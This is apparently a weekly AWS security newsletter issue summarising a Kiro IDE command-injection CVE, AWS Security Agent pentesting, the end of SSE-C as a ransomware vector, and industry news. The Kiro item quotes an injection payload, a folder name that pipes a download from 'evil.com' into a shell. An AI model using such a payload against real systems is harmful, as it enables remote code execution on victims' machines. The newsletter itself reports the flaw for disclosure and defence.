Monday,
January 12, 2026

๐Ÿฅ– Palette Cleanser

I'm a sucker for industry drama. Orca and Wiz kissed and made up after the Patent Board declared Orca's agentless scanning patents "obvious" - which, ironically, is what everyone else thought about this lawsuit from the start. Both sides walk away paying their own legal bills and promising never to speak of this again.

I missed this last week, and it's not AWS related but it's too good not to mention. Google Cloud's Application Integration let anyone send emails from a legit Google address (noreply-application-integration@google.com), and attackers used it to phish 3,200 orgs with emails that bypass spam filters because they're technically real Google emails. The clouds are fun.

Have feedback about AWS Security Digest? Tell us here. This issue is also available to share online.

๐Ÿ“‹ Chef's selections

  • (CVE-2026-0830) AWS Kiro GitLab Helper RCE by Dhiraj Mishra

    Kiro, AWS's AI-powered IDE, has a GitLab MR helper that builds shell commands like `cd ${workingDir}; git branch` and passes them straight to `child_process.exec` without quoting the path. Clone a repo into a folder named `pwned;curl evil.com|sh`, open it in Kiro, and you've got arbitrary code execution before git even runs. Fixed in 0.6.18, but a textbook reminder that string interpolation into shell commands is the vulnerability that refuses to die.

  • AWS Security Agent - Penetration Testing Overview by Sena Yakut

    AWS Security Agent, announced at re:Invent 2025, is AWS's automated "+1 teammate" for pentesting - handling Design Review, Code Review, and active Penetration Testing against your apps. Sena demos it against DVWA (the intentionally vulnerable test app) running on EC2 to show what the agent catches. It won't replace your pentesters, but it might give a "second pair of eyes" without the calendar negotiation.

  • AWS Ends SSE-C Encryption and a Ransomware Vector by Rich Mogull

    This was actually announced in November 2025. AWS is killing SSE-C (customer-provided encryption keys) in April 2026 after researchers found attackers could copy S3 objects, re-encrypt them with their own keys, and delete the originals - instant ransomware with just basic read/write permissions, no KMS needed. Rich calls SSE-C "an odd duck" that predates proper key management and saw minimal legitimate use anyway. Use KMS with customer-managed keys or client-side encryption instead.

๐Ÿฅ— AWS security blogs

๐Ÿ› Reddit threads on r/aws

๐Ÿ’ธ Sponsor shoutout

Pleri logo

Meet Pleri: your AI-powered cloud security teammate. Sheโ€™s not a chatbot. Pleri proactively finds meaningful security work and fixes issues before they become problems.

Learn more about Pleri and see her in action.

๐Ÿค– Dessert

Dessert is made by robots, for those that enjoy the industrial content.

๐Ÿง IAM permission changes

๐Ÿช API changes

๐Ÿน IAM managed policy changes

โ˜• CloudFormation resource changes

    No resource updates this week.

๐ŸŽฎ Amazon Linux vulnerabilities

๐Ÿ“บ AWS security bulletins

๐Ÿšฌ Security documentation changes

YouTube Twitter LinkedIn

Crafted with โค๏ธ by Plerion. We simplify cloud security.